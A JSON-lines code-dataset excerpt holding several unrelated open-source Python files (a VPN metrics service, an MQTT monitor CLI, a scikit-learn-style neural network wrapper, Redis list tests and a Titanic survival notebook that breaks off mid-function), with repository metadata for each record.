previous_metrics['bytes_out']:\n\t\t\t\tself.logger.info('VPNMetricService::_compare_metrics: VPN metrics have been reset within last hour, not enough data')\n\t\t\t\treturn { 'bytes_in': 0, 'bytes_out': 0}\n\n\t\t\treturn {\n\t\t\t\t'bytes_in': current_metrics['bytes_in'] - previous_metrics['bytes_in'],\n\t\t\t\t'bytes_out': current_metrics['bytes_out'] - previous_metrics['bytes_out'],\n\t\t\t}\n\t\texcept Exception as e:\n\t\t\traise Exception('VPNMetricService::_compare_metrics: Failed to compare given metrics: ' + str(e))\n\n\tdef _get_network_bytes(self, interface):\n\t\t\"\"\"Returns number of bytes in and out of specified network interface since boot/ifup\"\"\"\n\t\tfor line in open('/proc/net/dev', 'r'):\n\t\t\tif interface in line:\n\t\t\t\tdata = line.split('%s:' % interface)[1].split()\n\t\t\t\trx_bytes, tx_bytes = (data[0], data[8])\n\t\t\t\treturn (int(rx_bytes), int(tx_bytes))\n\t\traise Exception('VPNMetricService::_get_network_bytes: Network interface not found: ' + interface)\n\n\tdef _collect_global_metrics(self, interval_name):\n\t\t\"\"\"Collects the global metrics from all of the service nodes, should be run from async job\"\"\"\n\t\tself._assert_interval_supported(interval_name, exclude=[\"hourly\"])\n\t\tglobal_metrics = {}\n\t\tscalar_params = ['bytes_in', 'bytes_out']\n\n\t\tfor ip, mn in self.mnsync_service.get_masternode_list(status_filter='ACTIVE').items():\n\t\t\tself.logger.debug('Collecting global metrics from node ' + ip)\n\t\t\t\n\t\t\tresponse = self.mn_gateway.webapi_query(ip) \n\n\t\t\tif response.error:\n\t\t\t\tself.logger.warning('Failed to collect VPN metrics from the node: ' + ip + ': ' + str(response.error))\n\t\t\t\tcontinue\n\n\t\t\tfor param in scalar_params:\n\t\t\t\ttry:\n\t\t\t\t\tvalue = response.result['services']['VPN']['metrics'][interval_name]['bytes_in']\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tself.logger.warning('Failed to parse VPN metrics info from node: ' + ip + ': ' + str(e))\n\t\t\t\t\tcontinue\n\n\t\t\t\tif param not in global_metrics:\n\t\t\t\t\tglobal_metrics[param] = value\n\t\t\t\telse:\n\t\t\t\t\tglobal_metrics[param] += value\n\n\t\treturn global_metrics\n\n\tdef _assert_interval_supported(self, interval_name, exclude = None):\n\t\tif not interval_name in self.intervals or exclude and interval_name == exclude:\n\t\t\traise Exception('VPNMetricService::update_recent_metrics: Unsupported interval ' + interval_name)\n\n","repo_name":"velescore/veles-masternode","sub_path":"masternode/dapps/vpn/metric_service.py","file_name":"metric_service.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22037538563","text":"\"\"\" mqtt_monitor \"\"\"\n\nimport asyncio.exceptions\nimport json\nfrom os import PathLike\nfrom pathlib import Path\nimport sys\nimport time\nfrom typing import Dict, List, Optional, TypedDict, Union\n\nimport click\nimport paho.mqtt.client as mqtt # type: ignore\nfrom pydantic import BaseModel\n\nclass UserData(TypedDict):\n \"\"\" userdata typing \"\"\"\n hostname: str\n port: str\n topics: List[str]\n keepalives: int\n\n\nclass ConfigFile(BaseModel):\n \"\"\" mqtt-monitor configuration model \"\"\"\n hostname: str\n port: int = 1883\n topics: List[str] = []\n keepalives: int = 60\n\nCONNECT_RC = {\n 0: \"Connection successful\",\n 1: \"Connection refused - incorrect protocol version\",\n 2: \"Connection refused - invalid client identifier\",\n 3: \"Connection refused - server unavailable\",\n 4: \"Connection refused - bad username or password\",\n 5: \"Connection refused - not authorised\",\n # 6-255: Currently unused.\n}\n\n\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(\n client: mqtt.Client,\n userdata: UserData,\n _: Dict[str, Union[int, str]],\n result_code: int,\n ) -> None:\n \"\"\" on_connect method \"\"\"\n msg = json.dumps({\n \"action\" : \"connected\",\n \"message\" : CONNECT_RC.get(result_code,f\"Unknown result code: {result_code}\"),\n })\n print(msg, file=sys.stderr)\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n for topic in userdata[\"topics\"]:\n client.subscribe(topic=topic)\n\n# The callback for when a PUBLISH message is received from the server.\n# pylint: disable=unused-argument\ndef on_message(\n client: mqtt.Client,\n userdata: UserData,\n msg: mqtt.MQTTMessage,\n ) -> None: # pylint: disable=unused-argument\n \"\"\" message handler \"\"\"\n try:\n message = json.loads(msg.payload)\n except json.JSONDecodeError:\n if isinstance(msg.payload, str):\n message = msg.payload.encode(\"utf-8\")\n else:\n message = msg.payload.decode(\"utf-8\")\n data = {\n \"_time\" : time.time(),\n \"topic\" : msg.topic,\n \"msg\" : message,\n }\n print(json.dumps(data, default=str, ensure_ascii=False), file=sys.stderr)\n\n@click.command()\n@click.option(\"--config-file\", type=Path, default=\"~/.config/mqtt-monitor.json\")\n@click.option(\"--hostname\")\n@click.option(\n \"--port\", \"-p\",\n type=int,\n default=1883,\n help=\"Port to connect to.\")\n@click.option(\n \"--topic\", \"-t\",\n default=None,\n multiple=True,\n help=\"Default is '#' which shows everything but system messages, can specify multiple times.\",\n )\ndef cli(\n config_file: Path=Path(\"~/.config/mqtt-monitor.json\"),\n hostname: Optional[str]=None,\n topic: Optional[List[str]]=None,\n port: int=1883,\n ) -> None:\n \"\"\" MQTT Monitor \"\"\"\n\n config_filepath = Path(config_file).expanduser().resolve()\n\n if config_filepath.exists():\n config = ConfigFile.parse_file(config_filepath)\n elif Path(\"mqtt-monitor.json\").exists():\n config = ConfigFile.parse_file(\"mqtt-monitor.json\")\n else:\n config = ConfigFile(hostname=hostname, topics=topic, port=port)\n\n print(json.dumps({\n \"action\" : \"startup\",\n \"hostname\" : config.hostname,\n \"port\" : config.port,\n \"topics\" : config.topics,\n }), file=sys.stderr)\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n\n client.user_data_set(config.dict())\n\n while True:\n try:\n client.connect(\n config.hostname,\n config.port,\n config.keepalives,\n )\n\n # Blocking call that processes network traffic, dispatches callbacks and\n # handles reconnecting.\n # Other loop*() functions are available that give a threaded interface and a\n # manual interface.\n client.loop_forever()\n except asyncio.exceptions.TimeoutError as error_message:\n print(json.dumps({\n \"error\" : \"timeout\",\n \"message\" : f\"sleeping for 60 seconds: {error_message}\",\n }), file=sys.stderr)\n time.sleep(60)\n except Exception as error: #pylint: disable=broad-except\n print(f\"Error, sleeping for 5 seconds: {error}\", file=sys.stderr)\n time.sleep(5)\n","repo_name":"yaleman/mqtt-monitor","sub_path":"mqtt_monitor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28531338512","text":"# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, unicode_literals, print_function)\n\n__all__ = ['Regressor', 'Classifier', 'Layer', 'Convolution']\n\nimport os\nimport sys\nimport math\nimport time\nimport logging\nimport itertools\n\nlog = logging.getLogger('sknn')\n\n\nimport numpy\nimport theano\nimport sklearn.base\nimport sklearn.pipeline\nimport sklearn.preprocessing\nimport sklearn.cross_validation\n\nfrom .nn import NeuralNetwork, Layer, Convolution, ansi\nfrom . import backend\n\n\nclass MultiLayerPerceptron(NeuralNetwork, sklearn.base.BaseEstimator):\n # Abstract base class for wrapping multi-layer perceptron functionality.\n __doc__ = NeuralNetwork.__doc__\n\n def _setup(self):\n pass\n\n def _initialize(self, X, y=None):\n assert not self.is_initialized,\\\n \"This neural network has already been initialized.\"\n self._create_specs(X, y)\n\n backend.setup()\n self._backend = backend.MultiLayerPerceptronBackend(self)\n return self._backend._initialize_impl(X, y)\n\n def _check_layer(self, layer, required, optional=[]):\n required.extend(['name', 'type'])\n for r in required:\n if getattr(layer, r) is None:\n raise ValueError(\"Layer type `%s` requires parameter `%s`.\"\\\n % (layer.type, r))\n\n optional.extend(['dropout', 'weight_decay'])\n for a in layer.__dict__:\n if a in required+optional:\n continue\n if getattr(layer, a) is not None:\n log.warning(\"Parameter `%s` is unused for layer type `%s`.\"\\\n % (a, layer.type))\n\n def _create_specs(self, X, y=None):\n # Automatically work out the output unit count based on dataset.\n if y is not None and self.layers[-1].units is None:\n self.layers[-1].units = y.shape[1]\n else:\n assert y is None or self.layers[-1].units == y.shape[1],\\\n \"Mismatch between dataset size and units in output layer.\"\n\n # Then compute the number of units in each layer for initialization.\n self.unit_counts = [numpy.product(X.shape[1:]) if self.is_convolution else X.shape[1]]\n res = X.shape[1:3] if self.is_convolution else None\n\n for l in self.layers:\n if isinstance(l, Convolution):\n assert l.kernel_shape is not None,\\\n \"Layer `%s` requires parameter `kernel_shape` to be set.\" % (l.name,)\n if l.border_mode == 'valid':\n res = (int((res[0] - l.kernel_shape[0]) / l.kernel_stride[0]) + 1,\n int((res[1] - l.kernel_shape[1]) / l.kernel_stride[1]) + 1)\n if l.border_mode == 'full':\n res = (int((res[0] + l.kernel_shape[0]) / l.kernel_stride[0]) - 1,\n int((res[1] + l.kernel_shape[1]) / l.kernel_stride[1]) - 1)\n unit_count = numpy.prod(res) * l.channels\n else:\n unit_count = l.units\n\n self.unit_counts.append(unit_count)\n\n def __getstate__(self):\n d = self.__dict__.copy()\n\n # If the MLP does not exist, then the client code is trying to serialize\n # this object to communicate between multiple processes.\n if self._backend is not None:\n d['weights'] = self._backend._mlp_to_array()\n\n for k in [k for k in d.keys() if k.startswith('_')]:\n del d[k]\n return d\n\n def __setstate__(self, d):\n self.__dict__.update(d)\n\n # Only create the MLP if the weights were serialized. Otherwise, it\n # may have been serialized for multiprocessing reasons pre-training.\n self._create_logger()\n self._backend = None\n\n def _reshape(self, X, y=None):\n if y is not None and y.ndim == 1:\n y = y.reshape((y.shape[0], 1))\n if self.is_convolution and X.ndim == 3:\n X = X.reshape((X.shape[0], X.shape[1], X.shape[2], 1))\n if self.is_convolution and X.ndim == 2:\n size = math.sqrt(X.shape[1])\n assert size.is_integer(),\\\n \"Input array is not in image shape, and could not assume a square.\"\n X = X.reshape((X.shape[0], int(size), int(size), 1))\n if not self.is_convolution and X.ndim > 2:\n X = X.reshape((X.shape[0], numpy.product(X.shape[1:])))\n return X, y\n\n def _fit(self, X, y):\n assert X.shape[0] == y.shape[0],\\\n \"Expecting same number of input and output samples.\"\n data_shape, data_size = X.shape, X.size+y.size\n X, y = self._reshape(X, y)\n\n if not self.is_initialized:\n X, y = self._initialize(X, y)\n\n log.info(\"Training on dataset of {:,} samples with {:,} total size.\".format(data_shape[0], data_size))\n if data_shape[1:] != X.shape[1:]:\n log.warning(\" - Reshaping input array from {} to {}.\".format(data_shape, X.shape))\n if self.valid_set is not None:\n X_v, _ = self.valid_set\n log.debug(\" - Train: {: <9,} Valid: {: <4,}\".format(X.shape[0], X_v.shape[0]))\n if self.regularize is not None:\n comment = \", auto-enabled from layers\" if self.regularize is None else \"\"\n log.debug(\" - Using `%s` for regularization%s.\" % (self.regularize, comment))\n if self.n_iter is not None:\n log.debug(\" - Terminating loop after {} total iterations.\".format(self.n_iter))\n if self.n_stable is not None and self.n_stable < (self.n_iter or sys.maxsize):\n log.debug(\" - Early termination after {} stable iterations.\".format(self.n_stable))\n\n if self.verbose:\n log.debug(\"\\nEpoch Validation Error Time\"\n \"\\n-----------------------------------\")\n\n try:\n self._backend._train_impl(X, y)\n except RuntimeError as e:\n log.error(\"\\n{}{}{}\\n\\n{}\\n\".format(\n ansi.RED,\n \"A runtime exception was caught during training. This likely occurred due to\\n\"\n \"a divergence of the SGD algorithm, and NaN floats were found by PyLearn2.\",\n ansi.ENDC,\n \"Try setting the `learning_rate` 10x lower to resolve this, for example:\\n\"\n \" learning_rate=%f\" % (self.learning_rate * 0.1)))\n raise e\n\n return self\n\n def _predict(self, X):\n X, _ = self._reshape(X)\n\n if self._backend is None:\n assert self.layers[-1].units is not None,\\\n \"You must specify the number of units to predict without fitting.\"\n if self.weights is None:\n log.warning(\"WARNING: Computing estimates with an untrained network.\")\n self._initialize(X)\n\n if not isinstance(X, numpy.ndarray):\n X = X.toarray()\n return self._backend._predict_impl(X)\n\n def get_params(self, deep=True):\n result = super(MultiLayerPerceptron, self).get_params(deep=True)\n for l in self.layers:\n result[l.name] = l\n return result\n\n\nclass Regressor(MultiLayerPerceptron, sklearn.base.RegressorMixin):\n # Regressor compatible with sklearn that wraps various NN implementations.\n\n def fit(self, X, y):\n \"\"\"Fit the neural network to the given continuous data as a regression problem.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_inputs)\n Training vectors as real numbers, where n_samples is the number of\n samples and n_inputs is the number of input features.\n\n y : array-like, shape (n_samples, n_outputs)\n Target values are real numbers used as regression targets.\n\n Returns\n -------\n self : object\n Returns this instance.\n \"\"\"\n return super(Regressor, self)._fit(X, y)\n\n def predict(self, X):\n \"\"\"Calculate predictions for specified inputs.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_inputs)\n The input samples as real numbers.\n\n Returns\n -------\n y : array, shape (n_samples, n_outputs)\n The predicted values as real numbers.\n \"\"\"\n return super(Regressor, self)._predict(X)\n\n\nclass Classifier(MultiLayerPerceptron, sklearn.base.ClassifierMixin):\n # Classifier compatible with sklearn that wraps various NN implementations.\n\n def _setup(self):\n super(Classifier, self)._setup()\n self.label_binarizers = []\n\n # WARNING: Unfortunately, sklearn's LabelBinarizer handles binary data\n # as a special case and encodes it very differently to multiclass cases.\n # In our case, we want to have 2D outputs when there are 2 classes, or\n # the predicted probabilities (e.g. Softmax) will be incorrect.\n # The LabelBinarizer is also implemented in a way that this cannot be\n # customized without a providing a complete rewrite, so here we patch\n # the `type_of_target` function for this to work correctly,\n import sklearn.preprocessing.label as spl\n spl.type_of_target = lambda _: \"multiclass\"\n\n def fit(self, X, y):\n \"\"\"Fit the neural network to symbolic labels as a classification problem.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training vectors as real numbers, where n_samples is the number of\n samples and n_inputs is the number of input features.\n\n y : array-like, shape (n_samples, n_classes)\n Target values as integer symbols, for either single- or multi-output\n classification problems.\n\n Returns\n -------\n self : object\n Returns this instance.\n \"\"\"\n\n assert X.shape[0] == y.shape[0],\\\n \"Expecting same number of input and output samples.\"\n if y.ndim == 1:\n y = y.reshape((y.shape[0], 1))\n\n if y.shape[1] == 1 and self.layers[-1].type != 'Softmax':\n log.warning('{}WARNING: Expecting `Softmax` type for the last layer '\n 'in classifier.{}\\n'.format(ansi.YELLOW, ansi.ENDC))\n if y.shape[1] > 1 and self.layers[-1].type != 'Sigmoid':\n log.warning('{}WARNING: Expecting `Sigmoid` for last layer in '\n 'multi-output classifier.{}\\n'.format(ansi.YELLOW, ansi.ENDC))\n\n # Deal deal with single- and multi-output classification problems.\n self.label_binarizers = [sklearn.preprocessing.LabelBinarizer() for _ in range(y.shape[1])]\n ys = [lb.fit_transform(y[:,i]) for i, lb in enumerate(self.label_binarizers)]\n yp = numpy.concatenate(ys, axis=1)\n\n # Also transform the validation set if it was explicitly specified.\n if self.valid_set is not None:\n X_v, y_v = self.valid_set\n if y_v.ndim == 1:\n y_v = y_v.reshape((y_v.shape[0], 1))\n ys = [lb.transform(y_v[:,i]) for i, lb in enumerate(self.label_binarizers)]\n y_vp = numpy.concatenate(ys, axis=1)\n self.valid_set = self._reshape(X_v, y_vp)\n \n # Now train based on a problem transformed into regression.\n return super(Classifier, self)._fit(X, yp)\n\n def partial_fit(self, X, y, classes=None):\n if y.ndim == 1:\n y = y.reshape((y.shape[0], 1))\n\n if classes is not None:\n if isinstance(classes[0], int):\n classes = [classes]\n self.label_binarizers = [sklearn.preprocessing.LabelBinarizer() for _ in range(y.shape[1])]\n for lb, cls in zip(self.label_binarizers, classes):\n lb.fit(cls)\n return self.fit(X, y)\n\n def predict_proba(self, X):\n \"\"\"Calculate probability estimates based on these input features.\n\n Parameters\n ----------\n X : array-like of shape [n_samples, n_features]\n The input data as a numpy array.\n\n Returns\n -------\n y_prob : array-like of shape [n_samples, n_classes]\n The predicted probability of the sample for each class in the\n model, in the same order as the classes.\n \"\"\"\n proba = super(Classifier, self)._predict(X)\n index = 0\n for lb in self.label_binarizers:\n sz = len(lb.classes_)\n proba[:,index:index+sz] /= proba[:,index:index+sz].sum(1, keepdims=True) \n index += sz\n return proba\n\n def predict(self, X):\n \"\"\"Predict class by converting the problem to a regression problem.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y : array-like, shape (n_samples,) or (n_samples, n_classes)\n The predicted classes, or the predicted values.\n \"\"\"\n assert self.label_binarizers != [],\\\n \"Can't predict without fitting: output classes are unknown.\"\n\n yp = self.predict_proba(X)\n ys = []\n index = 0\n for lb in self.label_binarizers:\n sz = len(lb.classes_)\n y = lb.inverse_transform(yp[:,index:index+sz], threshold=0.5)\n ys.append(y.reshape((y.shape[0], 1)))\n index += sz\n y = numpy.concatenate(ys, axis=1)\n return y\n","repo_name":"lenguyenthedat/scikit-neuralnetwork","sub_path":"sknn/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":13359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"31596612271","text":"import pytest\n\nfrom upstash_redis import Redis\n\n\n@pytest.fixture(autouse=True)\ndef flush_lists(redis: Redis):\n lists = [\"list1\", \"list2\", \"list3\", \"nonexistent_list\"]\n\n for list_name in lists:\n redis.delete(list_name)\n\n yield\n\n for list_name in lists:\n redis.delete(list_name)\n\n\ndef test_rpush_existing_list(redis: Redis):\n mylist = \"list1\"\n values = [\"value1\", \"value2\", \"value3\"]\n\n result = redis.rpush(mylist, *values)\n assert result == 3\n\n expected_list = [\"value1\", \"value2\", \"value3\"]\n assert redis.lrange(mylist, 0, -1) == expected_list\n\n\ndef test_rpush_empty_list(redis: Redis):\n mylist = \"list2\"\n\n with pytest.raises(Exception):\n redis.rpush(mylist)\n\n\ndef test_rpush_nonexistent_list(redis: Redis):\n mylist = \"nonexistent_list\"\n\n result = redis.rpush(mylist, \"value1\", \"value2\")\n assert result == 2\n\n expected_list = [\"value1\", \"value2\"]\n assert redis.lrange(mylist, 0, -1) == expected_list\n","repo_name":"upstash/redis-python","sub_path":"tests/commands/list/test_rpush.py","file_name":"test_rpush.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"15691002735","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Titanic Competition \n# \n# By Atwine Mugume Twinamatsiko\n\n# ### Competition Description:\n# The sinking of the RMS Titanic is one of the most infamous shipwrecks in history. On April 15, 1912, during her maiden voyage, the Titanic sank after colliding with an iceberg, killing 1502 out of 2224 passengers and crew. This sensational tragedy shocked the international community and led to better safety regulations for ships.\n# \n# One of the reasons that the shipwreck led to such loss of life was that there were not enough lifeboats for the passengers and crew. Although there was some element of luck involved in surviving the sinking, some groups of people were more likely to survive than others, such as women, children, and the upper-class.\n# \n# In this challenge, we ask you to complete the analysis of what sorts of people were likely to survive. In particular, we ask you to apply the tools of machine learning to predict which passengers survived the tragedy.\n# \n# This is a supervised problem because we already have the labeled data in which we want to classify the information\n# \n# ### Evaluation is based on accuracy:\n# \n# The evaluation of the hand in result files is based on the accuracy of the predictions:\n# from sklearn we can import the accuracy score and use it to test our predictions.\n# \n# Hand in format is:\n# Passenger ID, Survived\n\n# In[ ]:\n\n\n#importing necessary libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nget_ipython().magic(u'matplotlib inline')\n\n\n# In[ ]:\n\n\n#let us import the data we have from the competition\ntest = pd.read_csv('../input/test.csv')\ntrain = pd.read_csv('../input/train.csv')\ngendr = pd.read_csv('../input/gender_submission.csv')\n\n\n# ### Now that the data has been imported we look at initial exploration\n# \n# Let's begin with the train dataset\n\n# In[ ]:\n\n\n#what does our dataset look like\ntrain.shape\n\n\n# In[ ]:\n\n\n#let us see the kind of dat types we are workng with\ntrain.info()\n\n\n# We have numeric and non numeric objects that we have to deal with since the machine learning algorithm only deals with numeric data\n\n# In[ ]:\n\n\ntrain.head()\n\n\n# ### Since the train and test data are at times similar its easier to work on them at the same time\n\n# In[ ]:\n\n\ntest.info()\n\n\n# As we can possibly see that the test info has only one column less than the training info and that is the survived column:\n\n# In[ ]:\n\n\n#lets first drom the survived column in the train dataset and then merge the two of them\nsurvived = train['Survived']\n\n\n# In[ ]:\n\n\ntrain.drop(columns=('Survived'), inplace=True)\n\n\n# In[ ]:\n\n\ntrain.shape\n\n\n# In[ ]:\n\n\n#first we create two differentiating columns in the two data frames\ntrain['Tag']='train'\ntest['Tag']= 'test'\n\n\n# In[ ]:\n\n\n#we now concetenate the fromes\nframes = [train, test]\ndf = pd.concat(frames)\n\n\n# In[ ]:\n\n\n#now we have the two data frames in one it is easier to apply the innitial exploration functions\ndf.head()\n\n\n# In[ ]:\n\n\n#there are some values that may not be necessary while we are doing our analysis such as name\ndrop_columns = ['PassengerId','Name','Ticket']\ndf.drop(columns=drop_columns, inplace=True)\n\n\n# In[ ]:\n\n\n#how many null values do we have\n#4 seem like a few\ndf.isnull().any().sum()\n\n\n# In[ ]:\n\n\ndf.info()\n\n\n# In[ ]:\n\n\ndf.head()\n\n\n# In[ ]:\n\n\n#now to separate the two data sets based on the tag columns\ntest_df = df[df['Tag']== 'test']\ntrain_df = df[df['Tag']== 'train']\n\n\n# In[ ]:\n\n\ntrain_df.drop(columns=('Tag'), inplace= True)\n\n\n# In[ ]:\n\n\ntest_df.drop(columns=('Tag'), inplace= True)\n\n\n# In[ ]:\n\n\n#these are the numeric data frames we have formed and are easy to look at\ntrain_df = pd.get_dummies(train_df)\ntest_df = pd.get_dummies(test_df)\n\n\n# In[ ]:\n\n\ntrain_df.head()\n\n\n# In[ ]:\n\n\n#one hot encoding adds variables that we did not create so we have to align the data frames\ntrain_df,test_df = train_df.align(test_df, join= 'inner', axis=1)\n\n\n# In[ ]:\n\n\nprint('The remaining features', train_df.shape)\nprint('The remaining test features', test_df.shape)\n\n\n# In[ ]:\n\n\n#now lets return the survived to the training data set\ntrain_df['Survived'] = survived\n\n\n# In[ ]:\n\n\ntrain_df.shape\n\n\n# In[ ]:\n\n\n#replace the NaN with 0 so that i can use the mean values to impute\ntrain_df['Age']= train_df['Age'].replace(0, np.nan)\ntrain_df.fillna(train_df.mean(), inplace=True)\n\ntest_df['Age']= test_df['Age'].replace(0, np.nan)\ntest_df.fillna(test_df.mean(), inplace=True)\n\n\n# ### Now that I have mostly numeric values lets explore\n\n# In[ ]:\n\n\n#lets have a loot at the survived variable\ntrain_df['Survived'].value_counts()\n\n\n# In[ ]:\n\n\n#lets display it\ntrain_df['Survived'].astype(int).hist()\n\n\n# In[ ]:\n\n\n#lets see if we have any missing values\n# we have none of those\ntrain_df.isnull().any().sum()\n\n\n# In[ ]:\n\n\n#column types\ntrain_df.dtypes.value_counts()\n\n\n# In[ ]:\n\n\n#what is the correlation of the variables to the target variable?\n\n\n# In[ ]:\n\n\nCorr = train_df.corr()['Survived'].sort_values()\n\n#Print them\nprint('Most positive correlations', Corr.tail(10))\nprint('-'*20)\nprint('Most negative correlations', Corr.head(10))\n\n\n# ### Manual feature Engineering:\n\n# ### Train features\n\n# In[ ]:\n\n\n#we need to group by the client id therefore we need to add it back inthe df\ntrain_df['ID'] = train['PassengerId']\ntrain_df.head()\n\n\n# In[ ]:\n\n\n#in order to create features we remove survived first\ntrain_df.drop(columns= ('Survived'), inplace= True)\n\n\n# In[ ]:\n\n\ntrain_df.head()\n\n\n# In[ ]:\n\n\n#we are going to make new features by the aggregation functions those arefunctions like mean and others\ntrain_agg = train_df.groupby('ID',as_index= False).agg(['count', 'mean', 'max', 'min', 'sum']).reset_index()\ntrain_agg.head()\n\n\n# We need to create new names for each of these columns. The following code makes new names by appending the stat to the name. Here we have to deal with the fact that the dataframe has a multi-level index. I find these confusing and hard to work with, so I try to reduce to a single level index as quickly as possible.\n\n# In[ ]:\n\n\n# List of column names\ncolumns = ['ID']\n\n# Iterate through the variables names\nfor var in train_agg.columns.levels[0]:\n # Skip the id name\n if var != 'ID':\n \n # Iterate through the stat names\n for stat in train_agg.columns.levels[1][:-1]:\n # Make a new column name for the variable and stat\n columns.append('train_%s_%s' % (var, stat))\n\n\n# In[ ]:\n\n\ntrain_agg.columns = columns\ntrain_agg.head()\n\n\n# In[ ]:\n\n\n#we have now to merge the train_df with the train agg\ntrain_df = train_df.merge(train_agg, on = 'ID', how = 'left')\n\n\n# In[ ]:\n\n\n# List of new correlations\nnew_corrs = []\n\n# Iterate through the columns \nfor col in columns:\n # Calculate correlation with the target\n corr = train_df['ID'].corr(train_df[col])\n \n # Append the list as a tuple\n\n new_corrs.append((col, corr))\n\n\n# In[ ]:\n\n\n\n\n\n# We have created many more columns but they are not all useful. We have to test the correlation if they need to be used in this instance\n\n# In[ ]:\n\n\n# Sort the correlations by the absolute value\n# Make sure to reverse to put the largest values at the front of list\nnew_corrs = sorted(new_corrs, key = lambda x: abs(x[1]), reverse = True)\nnew_corrs[:15]\n\n\n# ### Test Features\n\n# In[ ]:\n\n\n#we now do the same thing for the test data\n#we need to group by the client id\ntest_df['ID'] = train['PassengerId']\n\n\n# In[ ]:\n\n\n#we are going to make new features by the aggregation functions those arefunctions like mean and others\ntest_agg = test_df.groupby('ID',as_index= False).agg(['count', 'mean', 'max', 'min', 'sum']).reset_index()\ntest_agg.head()\n\n\n# In[ ]:\n\n\n# List of column names\ncolumns2 = ['ID']\n\n# Iterate through the variables names\nfor var2 in test_agg.columns.levels[0]:\n # Skip the id name\n if var2 != 'ID':\n \n # Iterate through the stat names\n for stat in test_agg.columns.levels[1][:-1]:\n # Make a new column name for the variable and stat\n columns2.append('test_%s_%s' % (var2, stat))\n\n\n# In[ ]:\n\n\ntest_agg.columns = columns2\ntest_agg.head()\n\n\n# In[ ]:\n\n\n#we have now to merge the train_df with the train agg\ntest_df = test_df.merge(test_agg, on = 'ID', how = 'left')\n\n\n# In[ ]:\n\n\ntrain_df.shape , test_df.shape\n\n\n# In[ ]:\n\n\n#because the data was made into two data frames now we combine them back to get the full number of peple on the boat\nadd = [train_df,test_df]\ntest_fin = pd.concat(add)\n\n\n# In[ ]:\n\n\n#returning the survived column to train\ntrain_df['Survived'] = survived\n\n\n# In[ ]:\n\n\ntrain_df.shape , test_df.shape\n\n\n# In[ ]:\n\n\n# train_df.to_csv('train_df.csv')\n# test_df.to_csv('test_df.csv')\n\n\n# In[ ]:\n\n\n\n\n\n# ## Modeling\n\n# In[ ]:\n\n\nimport lightgbm as lgb\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\n\nimport gc\n\nimport matplotlib.pyplot as plt\n\n\n# In[ ]:\n\n\ndef model(features, test_features, encoding = 'ohe', n_folds = 5):\n \n \"\"\"Train and test a light gradient boosting model using\n cross validation. \n \n Parameters\n --------\n features (pd.DataFrame): \n dataframe of training features to use \n for training a model. Must include the TARGET column.\n test_features (pd.DataFrame): \n dataframe of testing features to use\n for making predictions with the model. \n encoding (str, default = 'ohe'): \n method for encoding categorical variables. Either 'ohe' for one-hot encoding or 'le' for integer label encoding\n n_folds (int, default = 5): number of folds to use for cross validation\n \n Return\n --------\n submission (pd.DataFrame): \n dataframe with `SK_ID_CURR` and `TARGET` probabilities\n predicted by the model.\n feature_importances (pd.DataFrame): \n dataframe with the feature importances from the model.\n valid_metrics (pd.DataFrame): \n dataframe with training and validation metrics (ROC AUC) for each fold and overall.\n \n \"\"\"\n \n # Extract the ids\n train_ids = features['ID']\n test_ids = test_features['ID']\n \n # Extract the labels for training\n labels = features['Survived']\n \n # Remove the ids and target\n features = features.drop(columns = ['ID', 'Survived'])\n test_features = test_features.drop(columns = ['ID'])\n \n \n # One Hot Encoding\n if encoding == 'ohe':\n features = pd.get_dummies(features)\n test_features = pd.get_dummies(test_features)\n \n # Align the dataframes by the columns\n features, test_features = features.align(test_features, join = 'inner', axis = 1)\n \n # No categorical indices to record\n cat_indices = 'auto'\n \n # Integer label encoding\n elif encoding == 'le':\n \n # Create a label encoder\n label_encoder = LabelEncoder()\n \n # List for storing categorical indices\n cat_indices = []\n \n # Iterate through each column\n for i, col in enumerate(features):\n if features[col].dtype == 'object':\n # Map the categorical features to integers\n features[col] = label_encoder.fit_transform(np.array(features[col].astype(str)).reshape((-1,)))\n test_features[col] = label_encoder.transform(np.array(test_features[col].astype(str)).reshape((-1,)))\n\n # Record the categorical indices\n cat_indices.append(i)\n \n # Catch error if label encoding scheme is not valid\n else:\n raise ValueError(\"Encoding must be either 'ohe' or 'le'\")\n \n print('Training Data Shape: ', features.shape)\n print('Testing Data Shape: ', test_features.shape)\n \n # Extract feature names\n feature_names = list(features.columns)\n \n # Convert to np arrays\n features = np.array(features)\n test_features = np.array(test_features)\n \n # Create the kfold object\n k_fold = KFold(n_splits = n_folds, shuffle = False, random_state = 50)\n \n # Empty array for feature importances\n feature_importance_values = np.zeros(len(feature_names))\n \n # Empty array for test predictions\n test_predictions = np.zeros(test_features.shape[0])\n \n # Empty array for out of fold validation predictions\n out_of_fold = np.zeros(features.shape[0])\n \n # Lists for recording validation and training scores\n valid_scores = []\n train_scores = []\n \n # Iterate through each fold\n for train_indices, valid_indices in k_fold.split(features):\n \n # Training data for the fold\n train_features, train_labels = features[train_indices], labels[train_indices]\n # Validation data for the fold\n valid_features, valid_labels = features[valid_indices], labels[valid_indices]\n \n # Create the model\n model = lgb.LGBMClassifier(n_estimators=10000, objective = 'binary', \n class_weight = 'balanced', learning_rate = 0.05, \n reg_alpha = 0.1, reg_lambda = 0.1, \n subsample = 